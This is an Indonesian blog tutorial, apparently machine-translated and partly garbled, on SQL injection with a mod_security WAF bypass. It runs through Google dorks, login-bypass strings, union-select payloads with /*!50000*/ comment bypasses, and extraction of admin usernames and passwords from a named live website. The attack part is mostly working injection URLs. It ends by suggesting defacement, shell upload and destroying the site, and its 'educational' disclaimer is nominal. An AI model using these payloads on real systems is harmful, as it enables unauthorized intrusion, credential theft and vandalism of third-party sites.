Monday, May 9, 2016

Sql Injection dasar WAF ( Web Application Firewal ) 406 Not Acceptable

Assamualaikum Wr WB

Sekarang Ane Mau Jelaskan Dan Share Tutorial Tentang
Sebelum lanjut lebih jauh mari mengenal dulu tentang SQL INJECTION
Apa itu SQL Injection ? o_O -

SQL injection adalah teknik kode injeksi, digunakan untuk menyerang aplikasi data-driven, di mana pernyataan SQL berbahaya dimasukkan ke bidang entri untuk eksekusi (misalnya untuk membuang isi database untuk penyerang).

Dalam SQL Injection kita dapat mengambil semua data penting dari situs web dan dapat melakukan aktivitas berbahaya atau dapat melakukan segala sesuatu yang kita inginkan. Its tergantung pada kita.

Catatan: - Tutorial ini adalah tujuan pendidikan. Jadi belajar teknik ini namun tidak membahayakan website.

Jadi Mari kita Mulai ->

Bagian 1: - Menggunakan Google Dorks

Google Dorks adalah senjata terbaik untuk melakukan proses ini khususnya buat para defacer.So gunakanlah dengan bijak. Kita dapat menemukan situs injeksi sql menggunakan dorks. Kalian dapat membuat dork sesusai kreasi kalian sendiri-sendiri
Download Dorks Di google haha :P

kalian dapat mencari Dorks dari Google
Cara Menggunakan Google Dorks: - Lets See
Pilih Dorks yang kamu inginkan atau sesuai kreasimu dan paste di Google dan kemudian memilih situs dari sana Seperti ini ->
www.merapi.bgl.esdm.go.id/view-r.php?id=1
Dan memilih situs apapun dari sana ->



Jadi sekarang mengerti tentang cara menggunakan google dorks ?

2: Periksa Kerentanan Situs Web
Sekarang ketika kita mendapatkan target maka bagian kita selanjutnya adalah untuk memeriksa situs rentan terhadap injeksi sql atau tidak
Untuk ini kalian harus meletakkan ( ' ) setelah nomor
tanpa tanda kurung lebih jelasnya kutip atas
misalnya. -> Http://www.tabletworld.co.in/order.php?pid=55 '<- Pemberitahuan ' setelah nomor
Hal ini penting untuk memeriksa kerentanan di situs
Jika situs rentan kalian akan melihat jenis jenis error dari sql

You Have an sql syntax < sudah sering kali di temuka bagi para injector

Situs kemungkinan besar rentan.
ada juga website yang tidak menampilkan errornya. misalnya ada kata2 yang hilang, blank , redirect

Bagian 3: - Cari Injeksi

Nah apa gunanya Injection? Lihat ini dengan baik2
Situs yang normal: -
http://www.tabletworld.co.in
Injeksi Point of Site yang normal: -


semoga kalian mengerti tentang cara injeknya dalam letak kerentanannya Tapi sekarang pertanyaan timbul bahwa bagaimana menemukan letak Injection di situs tertentu Nah untuk letak cari injeksinya dengan cara seperti di bawah ini -> 1.Open setiap link dari situs tertentu dan menggunakan ' untuk memeriksa kerentanan 2. Menggunakan Google Dorks: p 3. Masukan Kode SQLI berbahaya di bagian Search bar atau di Login Bagian Ini adalah Beberapa Kode SQLI berbahaya untuk input 'Atau' 1 '=' 1 'Atau' x '=' x 'Atau 0 = 0 - "Atau 0 = 0 - atau 0 = 0 - 'Atau 0 = 0 # "Atau 0 = 0 # atau 0 = 0 # 'Atau' x '=' x "Atau" x "=" x ') Atau (' x '=' x 'Atau 1 = 1- "Atau 1 = 1- atau 1 = 1- 'Atau = a- "Atau" a "=" a ') Atau (' a '=' a ") Atau (" a "=" a hi "atau" a "=" a hi "atau 1 = 1 - hi 'atau 1 = 1 - 'Or'1 = 1' Sekarang saya akan memberitahu kalian bagaimana untuk lihat letak injeksi menggunakan Google Dorks. Hanya menggunakan Dorks berikut di google dan kalian kan melihat hasil yang diinginkan. Cukup gunakan semua itu hasil satu persatu 1. inurl:? Php id = site: www.sitename.com 2. site: www.sitename.com "php?" 3. site: www.target.com php 4. site: www.sitename.com .php? / Php? Id = 5. Dengan menggunakan bing -> ip: 127.0.0.1 "php id?" Di mana kalian akan menggunakan ip dari situs tertentu 6. site: "* site.com." Inurl: "php?" 7. site.com/robots.txt 8. inurl: ".? Php id =" + site: www.site.com Berikut ini adalah contoh live dari menggunakan Above Dorks inurl: .php id = site:? http: //www.tabletworld.co.in Berikut adalah hasil: -


dari banyak yang muncul Saya memilih yang satu ini http://www.tabletworld.co.in/order.php?pid=55 Harap kalian memahami bagian ini Bagian 4: - Langkah SQLI Estat datang sekarang setelah mendapatkan situs rentan Berikut adalah target kami http://www.tabletworld.co.in/order.php?pid=55 Langkah 1: - Gunakan 'setelah nomor http://www.tabletworld.co.in/order.php?pid=55 ' Kesalahan: - You Have An Sql Syntax
Situs berarti rentan Langkah 2: - Cari jumlah kolom Untuk jumlah menemukan kolom kita menggunakan perintah ini 1. order by 2. Group By 3. Procedur Analyst () Nah kali ini saya hanya menggunakan perintah dengan perintah. Bila kalian melihat perintah oleh perintah tidak bekerja maka kita menggunakan grup dengan perintah Tentang Procedur Analyst () saya akan memberitahu nanti Order by perintah ---> http://www.tabletworld.co.in/order.php?pid=55 order by 1- <--- no error http://www.tabletworld.co.in/order.php?pid=55 order by 10- <--- no error http://www.tabletworld.co.in/order.php?pid=55 order by 20- <--- no error http://www.tabletworld.co.in/order.php?pid=55 order by 30- <--- error Diketahui Kolom '30' di 'order clause' jumlah kemungkinan kolom kurang dari 30 dan di atas dari 20 Beberapa waktu kalian tidak akan melihat kesalahan itu, tetapi beberapa hilang pada page.So cek hati-hati Agar http://www.tabletworld.co.in/order.php?pid=55 oleh 25- <- error Diketahui Kolom '25' di 'order clause' jumlah mean kolom kurang dari 25 Agar http://www.tabletworld.co.in/order.php?pid=55 oleh 24- <- no error mean kita memiliki 24 jumlah kolom Langkah 3: Cari Kolom rentan Sekarang langkah berikutnya adalah untuk menemukan kolom rentan pada mereka 24 kolom. Karena kita masukan sqli pertanyaan kami di kolom tersebut rentan Kami menggunakan perintah ini ---> union select http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24- Perhatikan - sebelum 55. Hal ini diperlukan ketika menggunakan union select command.But kadang-kadang kita tidak menggunakan - sebelum nomor. Kami menggunakan metode lain / trik bukannya -. Tapi ketika digunakan dan apa yang harus digunakan. Aku akan memberitahu tentang hal ini di tutorial lain Sekarang setelah itu ketika digunakan union select saya melihat Pesan WAF ini Tidak dapat diterima! Representasi yang tepat dari sumber daya yang diminta tidak dapat ditemukan di server ini. Kesalahan ini dihasilkan oleh mod_security. Apa WAF -> Web Application Firewall yang digunakan untuk melindungi situs dari hacking attacks.But ada banyak metode untuk memotong bahwa WAF Ini adalah WAF Pesan -> 406 Tidak dapat diterima 403 Forbidden 404 500 Di atas Pesan WAF kita menggunakan metode yang berbeda yang berbeda untuk memotong WAF Sekarang datang ke situs yang di mana kita melihat bahwa kesalahan di atas Untuk memotong WAF kita menggunakan komentar -> / * * / Seperti -!!> / * Serikat * / atau / * 50000 * / -!!> / * 50000union * / http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / pilih 1,2,3,4,5,6,7,8,9,10,11,12 , 13,14,15,16,17,18,19,20,21,22,23,24- Nah kolom rentan adalah -> 5 & 7 Sekarang pertanyaan berbahaya seluruh keinginan kita akan dengan menempatkan pada mereka kolom rentan seperti ini Untuk versi -> versi () & @@ version http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4, version (), 6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24- Sekarang melihat dengan hati-hati. Saya menggunakan versi () perintah dengan mengganti rentan kolom 5 kita juga bisa menggunakan pertanyaan kami di kedua kolom rentan yaitu 5 & 7 Nah mengapa kita menggunakan versi ada? Karena setelah versi cek kami datang untuk mengetahui bahwa apa yang harus dilakukan selanjutnya Seperti -> Jika versi di atas dari 5 maka kita dapat menggunakan information_schema untuk membuang tabel, kolom Tetapi jika versi bawah dari 5 maka kita membuang tabel membabi buta. Di sana kita tidak bisa menggunakan information_schema Langkah 4: - Cari Data tabel Sekarang langkah berikutnya adalah untuk mencari data tabel dari situs Perintah yang kita gunakan untuk data tabel find adalah -> table_name dari information_schema.tables dimana table_schema = database yang () Sekarang bagaimana dan di mana untuk menggunakan perintah di atas? Ayo lihat http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / pilih 1,2,3,4, table_name, 6,7,8,9,10,11,12 , 13,14,15,16,17,18,19,20,21,22,23,24 dari information_schema.tables mana table_schema = database yang () - Pemberitahuan: - table_name -> di kolom rentan 5. Dan sisanya kami perintah setelah nomor 24 tapi sebelum - Jadi ingat ini. : P Nah sekarang hasilnya adalah dalam pesan WAF Pesan Tidak dapat diterima! Representasi yang tepat dari sumber daya yang diminta tidak dapat ditemukan di server ini. Kesalahan ini dihasilkan oleh mod_security. ! Sekarang saya menggunakan / * 50000 * / di dari kata seperti -> / * 50000from * / Nah bagaimana kalian tahu di mana harus menempatkan metode WAF BPASS di mana tempat. Jangan Worry.I akan memberitahu kalian di tutorial saya yang lain tentang pertama pemahaman WAF Perilaku dari menerapkan bahwa WAF Metode Bypass. Berikut adalah kode: - http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / pilih 1,2,3,4, table_name, 6,7,8,9,10,11,12 !, 13,14,15,16,17,18,19,20,21,22,23,24 / * 50000from * / information_schema.tables mana table_schema = database yang () - Hasil: - http://prntscr.com/528q74 Perhatikan bahwa Sekarang saya juga menggunakan satu lagi perintah -> concat () -> fungsi CONCAT digunakan untuk menggabungkan dua string untuk membentuk string tunggal group_concat () ---> GROUP_CONCAT digunakan ketika kalian ingin memiliki data dari baris kolom yang berbeda dalam satu baris. Untuk ini, kalian harus memiliki GROUP BY untuk bekerja. concat_ws () ---> CONCAT_WS hanya untuk bergabung dua nilai. Nah di situs ini ketika kita menggunakan group_concat () fungsi kita melihat kesalahan ini -> Kode -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / pilih 1,2,3,4, group_concat (table_name), 6,7,8,9,10, ! 11,12,13,14,15,16,17,18,19,20,21,22,23,24 / * 50000from * / information_schema.tables mana table_schema = database yang () - WAF Pesan -> Tidak dapat diterima! Representasi yang tepat dari sumber daya yang diminta tidak dapat ditemukan di server ini. Kesalahan ini dihasilkan oleh mod_security. Bypass menggunakan / *! 50000group_concat * / () Seperti -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000group_concat * / (table_name), 6,7,8 !, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / * 50000from * / information_schema.tables mana table_schema = database yang () - Sekarang Kesalahan -> FUNGSI marvelso_tabletworld.group_concat tidak ada. Periksa 'Fungsi Nama Parsing dan Resolusi' bagian dalam Manual Referensi Its berarti kalian tidak dapat menggunakan fungsi group_concat there.So akan kita gunakan concat () ada Kode -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (table_name), 6,7,8 !, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / * 50000from * / information_schema.tables mana table_schema = database yang () - Sekarang hasil -> http://prntscr.com/529rmf kalian lihat tabel admin ada. Bagaimana jika kalian tidak lihat tabel admin ada? Dua alasan -> Mungkin ada tabel tidak admin dalam database ATAU Karena fungsi concat kami tidak dapat melihat orang lain tabel terlalu Jika kita menggunakan group_concat kita dapat melihat semua rincian tabel pada halaman Tapi dalam fungsi concat kita dapat melihat hanya satu meja detail.But untuk lihat detail meja lain kita menggunakan perintah ini -> membatasi 0,1 seperti ini http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (table_name), 6,7,8 , 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / *! 50000from * / information_schema.tables mana table_schema = database yang () membatasi 0, 1 - kalian dapat meningkatkan batas seperti ini -> membatasi 1,1 limit 2,1 limit 3,1 dll Lihat kode -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (table_name), 6,7,8 , 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / *! 50000from * / information_schema.tables mana table_schema = database yang () membatasi 1, 1 - Dan melihat Hasil -> http://prntscr.com/529t6g Perhatikan bahwa tkalian merah. Itulah 2 tabel database satu lagi menggunakan limit 2,1 -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (table_name), 6,7,8 , 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / *! 50000from * / information_schema.tables mana table_schema = database yang () membatasi 3, 1 - Hasil lain -> http://prntscr.com/529tl2 3 meja lain -> customer Harap sekarang kalian memahami untuk menggunakan concat () fungsi menggunakan limit 0,1 fungsi. Jika tidak, kalian dapat bertanya kepada saya keraguan kalian. Langkah 5: - Cari Kolom rinci Perintah untuk ini -> column_name dari information_schema.columns dimana table_name = 'nama tabel di sini' Catatan :- nama tabel kalian harus dalam hex format.How saya akan menunjukkan kalian Lihat Kode ini -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (column_name), 6,7,8 !, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / * 50000from * / information_schema.columns mana table_name = 0x61646d696e - Dimana -> 0x61646d696e adalah -> admin Hasil -> http://prntscr.com/529wlr Kita lagi menggunakan fungsi batas untuk mendapatkan rincian lebih lanjut kolom http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (column_name), 6,7,8 , 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / *! 50000from * / information_schema.columns mana batas table_name = 0x61646d696e 1,1- Hasil -> http://prntscr.com/529x8k Lagi rincian kolom berikutnya menggunakan batas 2,1 http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4, / *! 50000concat * / (column_name), 6,7,8 , 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 / *! 50000from * / information_schema.columns mana batas table_name = 0x61646d696e 2,1- Hasil -> http://prntscr.com/529xp7 Jadi sekarang kita punya kami keinginan rincian kolom -> id, username, password rinci ini cukup untuk hacking seperti yang kita akan mendapatkan rincian admin menggunakan yang Langkah 6: -Cari rincian admin [namanya, passowrd dll] Perintah -> concat (username, 0x3a, x3a, password) <- Dimana 0x3a adalah hex coding dari: dari nama tabel di sini seperti admin Kode -> http://www.tabletworld.co.in/order.php?pid=-55 / *! 50000union * / select 1,2,3,4,/*!50000concat*/(username,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ! / * 50000from * / admin - Hasil:- http://prntscr.com/52a00l Jadi, kita mendapatkan rincian admin database -> username: - admin password: - admin Bagian 5: - Apa yang kita lakukan setelah mendapatkan rincian admin yaitu username, password Nah pergi dan menemukan halaman admin dari situs di mana kalian memasukkan rincian admin sana dan memasuki dunia admin panel.Where kalian dapat mengontrol everything.What kita dapat melakukan -> 1.Deface website 2.Shell upload 3. Hancurkan website Dan masih banyak lagi Nah bagaimana untuk mendapatkan halaman admin dari situs -> Hanya mencoba ini berikut -> http://sitename.com/admin http://sitename.com/administrator http://sitename.com/login http://sitename.com/robots.txt Ini adalah beberapa. Ada metode lain yang lebih. kalian juga dapat menggunakan alat finder admin untuk menemukan halaman admin. Nah bagaimana menggunakan semua ini dan melakukan things.Don't Worry seperti saya akan memberitahu kalian di tutorial berikutnya.

Post a Comment

Whatsapp Button works on Mobile Device only

Start typing and press Enter to search